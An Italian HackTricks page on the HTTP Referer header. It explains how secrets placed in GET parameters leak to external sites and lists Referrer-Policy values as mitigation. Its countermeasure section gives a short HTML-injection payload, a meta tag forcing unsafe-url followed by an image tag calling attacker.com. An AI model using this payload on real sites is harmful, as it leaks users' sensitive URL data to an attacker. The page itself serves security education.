2.4 KiB
{% hint style="success" %}
Impara e pratica l'hacking su AWS: HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica l'hacking su GCP: HackTricks Training GCP Red Team Expert (GRTE)
Sostieni HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repository di Github.
Intestazioni referrer e policy
Il Referrer è l'intestazione utilizzata dai browser per indicare quale è stata la pagina precedente visitata.
Informazioni sensibili divulgate
Se in un punto qualsiasi all'interno di una pagina web sono presenti informazioni sensibili nei parametri di una richiesta GET, se la pagina contiene collegamenti a fonti esterne o un attaccante è in grado di far/suggerire (ingegneria sociale) all'utente di visitare un URL controllato dall'attaccante, potrebbe essere in grado di esfiltrare le informazioni sensibili all'interno dell'ultima richiesta GET.
Mitigazione
È possibile fare in modo che il browser segua una politica del Referrer che potrebbe evitare che le informazioni sensibili vengano inviate ad altre applicazioni web:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Contromisure
Puoi annullare questa regola utilizzando un tag meta HTML (l'attaccante deve sfruttare un'iniezione HTML):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
Difesa
Mai inserire dati sensibili nei parametri GET o nei percorsi dell'URL.